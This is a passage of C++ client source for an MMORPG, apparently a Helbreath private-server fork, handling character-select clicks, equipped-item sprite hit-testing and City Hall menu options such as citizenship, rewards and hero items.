						m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
						GetIPByDNS();
						m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort +(rand()%1), WM_USER_LOGSOCKETEVENT);
						m_pLSock->bInitBufferSize(30000);
						ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
						m_dwConnectMode  = MSGID_REQUEST_ENTERGAME;
						m_wEnterGameType = DEF_ENTERGAMEMSGTYPE_NEW;
						ZeroMemory(m_cMsg, sizeof(m_cMsg));
						strcpy(m_cMsg,"33");
						ZeroMemory(m_cMapName, sizeof(m_cMapName));
						memcpy(m_cMapName, m_pCharList[m_cCurFocus-1]->m_cMapName, 10);
						delete pMI;
						return;
			}	}	}
			break;

		case 6:
			if (m_iTotalChar < 4)
			{	_InitOnCreateNewCharacter();
				ChangeGameMode(DEF_GAMEMODE_ONCREATENEWCHARACTER);
				delete pMI;
				return;
			}
			break;

		case 7: // centu - sin limite para borrar personajes
			if (m_pCharList[m_cCurFocus - 1] != NULL) 
			{	ChangeGameMode(DEF_GAMEMODE_ONQUERYDELETECHARACTER);
				m_wEnterGameType = m_cCurFocus;
				delete pMI;
				return;
			}
			break;

		case 8:
			ChangeGameMode(DEF_GAMEMODE_ONCHANGEPASSWORD);
			delete pMI;
			return;

		case 9:
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
		}
	}

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

BOOL CGame::bDlgBoxPress_Character(short msX, short msY)
{
	int i;
	short sX, sY, sSprH, sFrame;
	char cEquipPoiStatus[DEF_MAXITEMEQUIPPOS];

	if (m_bIsDialogEnabled[17] == TRUE) return FALSE;

	sX = m_stDialogBoxInfo[1].sX;
	sY = m_stDialogBoxInfo[1].sY;
	for (i = 0; i < DEF_MAXITEMEQUIPPOS; i++) cEquipPoiStatus[i] = -1;
	for (i = 0; i < DEF_MAXITEMS; i++)
	{	if ((m_pItemList[i] != NULL) && (m_bIsItemEquipped[i] == TRUE))	cEquipPoiStatus[ m_pItemList[i]->m_cEquipPos ] = i;
	}

	if ((m_sPlayerType >= 1) && (m_sPlayerType <= 3))
	{	if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 72, sY + 135, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_HEAD];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RFINGER] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 32, sY + 193, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_RFINGER];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LFINGER] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 90, sY + 175, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_LFINGER];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_NECK] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 35, sY + 120, sFrame, msX, msY ) )
			{
				m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_NECK];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
			}
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 57, sY + 186, sFrame, msX, msY ) )
			{
				m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_TWOHAND];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RHAND] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 57, sY + 186, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_RHAND];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LHAND] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 90, sY + 170, sFrame, msX, msY ) )
			{
				m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_LHAND];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_FULLBODY];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BODY] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_BODY];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_BOOTS];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_ARMS] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_ARMS];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_PANTS];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BACK] != -1)
		{	sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison( sX + 41, sY + 137, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_BACK];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
	}else if ((m_sPlayerType >= 4) && (m_sPlayerType <= 6))
	{	if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 72, sY + 139, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_HEAD];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RFINGER] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 32, sY + 193, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_RFINGER];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LFINGER] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 90, sY + 175, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_LFINGER];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_NECK] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 35, sY + 120, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_NECK];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 60, sY + 191, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_TWOHAND];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RHAND] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 60, sY + 191, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_RHAND];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LHAND] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 84, sY + 175, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_LHAND];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BODY] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_BODY];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_FULLBODY];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if ((cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1))
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_BOOTS];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_ARMS] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_ARMS];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_PANTS];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
		}	}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BACK] != -1)
		{	sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 45, sY + 143, sFrame, msX, msY ) )
			{	m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = m_sItemEquipmentStatus[DEF_EQUIPPOS_BACK];
				m_stMCursor.sDistX = 0;
				m_stMCursor.sDistY = 0;
				return TRUE;
	}	}	}
	return FALSE;
}

void CGame::DlgBoxClick_CityhallMenu(short msX, short msY)
{short sX, sY;
	sX = m_stDialogBoxInfo[13].sX;
	sY = m_stDialogBoxInfo[13].sY;
	switch (m_stDialogBoxInfo[13].cMode) {
	case 0:
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 70) && (msY < sY + 95))
		{	m_stDialogBoxInfo[13].cMode = 1; // citizenship rq
			PlaySound('E', 14, 5);
		}
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 95) && (msY < sY + 120))
		{	if (m_iRewardGold <= 0) return;
			m_stDialogBoxInfo[13].cMode = 5; // rq reward gold
			PlaySound('E', 14, 5);
		}
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 120) && (msY < sY + 145))
		{	if (m_iEnemyKillCount < 100) return;
			m_stDialogBoxInfo[13].cMode = 7;
			PlaySound('E', 14, 5);
		}
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 145) && (msY < sY + 170))
		{	if (m_stQuest.sQuestType == NULL) return;
			m_stDialogBoxInfo[13].cMode = 8;
			PlaySound('E', 14, 5);
		}
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 170) && (msY < sY + 195))
		{	if (m_bIsCrusadeMode) return;
			if (m_bIsHeldenian) return;
			if (m_iPKCount != 0) return;
			if (m_bCitizen == FALSE) return;
			if ((m_iLevel > 100) && (m_bHunter==FALSE)) return;
			m_stDialogBoxInfo[13].cMode = 9;
			PlaySound('E', 14, 5);
		}
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 195) && (msY < sY + 220))
		{	m_stDialogBoxInfo[13].cMode = 10;
			m_iTeleportMapCount = -1;
			bSendCommand(MSGID_REQUEST_TELEPORT_LIST, NULL, NULL, NULL, NULL, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 220) && (msY < sY + 245)) {
			if (m_bIsCrusadeMode == FALSE) return;
			EnableDialogBox(33, 1, NULL, NULL);
			PlaySound('E', 14, 5);
		}

		// MORLA 2.4 - Click en Trade Items		
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 240) && (msY < sY + 257))
		{
			EnableDialogBox(57, 2, NULL, NULL);
			PlaySound('E', 14, 5);
		}

		//MORLA 2.4 - DK Set		
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 260) && (msY < sY + 273))
		{
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQDKSET, NULL, NULL, NULL, NULL, NULL);
			PlaySound('E', 14, 5);
		}

		//MORLA 2.4 - Clcik en TP DeathMach Game
		if ((msX > sX + 35) && (msX < sX + 220) && (msY > sY + 280) && (msY < sY + 293))
		{
			if (bDeathmatch) bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQTPDG, NULL, NULL, NULL, NULL, NULL); // MORLA2.2 - Pregunta EK y REP del player
			PlaySound('E', 14, 5);
		}
		break;

	case 1:
		if (m_bCitizen == TRUE) 
		{
			if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
			{	// Yes Click
				if (m_iGizonItemUpgradeLeft >= 1000)
				{
					bSendCommand(DEF_REQUEST_CHANGECITY_YES, 0, 0, 0, 0 ,0, NULL, 0);
				}
				else
				{
					AddEventList("Not enough Majestic Points. Req: 1000", 10);
					break;
				}
				m_stDialogBoxInfo[13].cMode = 2;
				PlaySound('E', 14, 5);
			}
			if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
			{	// No Click
				m_stDialogBoxInfo[13].cMode = 0;
				PlaySound('E', 14, 5);
			}
		}
		else 
		{
			if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
			{	// Yes Click
				bSendCommand(MSGID_REQUEST_CIVILRIGHT, DEF_MSGTYPE_CONFIRM, NULL, NULL, NULL, NULL, NULL);
				m_stDialogBoxInfo[13].cMode = 2;
				PlaySound('E', 14, 5);
			}
			if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
			{	// No Click
				m_stDialogBoxInfo[13].cMode = 0;
				PlaySound('E', 14, 5);
			}
		}
		break;

	case 3:	//
	case 4:	// OK
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// No Click
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;

	case 5:
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Yes
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_GETREWARDMONEY, NULL, NULL, NULL, NULL, NULL);
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);

		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// No
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;

	// 3.51 Cityhall Menu - Request Hero's Items - Diuuude - fix by Drajwer
	case 7:
 		int iReqHeroItemID;
 		// Hero's Cape
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 95) && (msY <= sY + 110))
 		{	if(m_bAresden == TRUE) iReqHeroItemID = 400;
  			else iReqHeroItemID = 401;
			ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
			memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU47,strlen(DRAW_DIALOGBOX_CITYHALL_MENU47));
  			m_stDialogBoxInfo[13].cMode = 11;
  			m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
  			PlaySound('E', 14, 5);
 		}
 		// Hero's Helm
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 125) && (msY <= sY + 140))
 		{	if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 403;
  			if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 404;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 405;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 406;
 	 		ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
 	 		memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU48,strlen(DRAW_DIALOGBOX_CITYHALL_MENU48));
 	 		m_stDialogBoxInfo[13].cMode = 11;
 	 		m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
 	 		PlaySound('E', 14, 5);
 		}
 		// Hero's Cap
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 155) && (msY <= sY + 170))
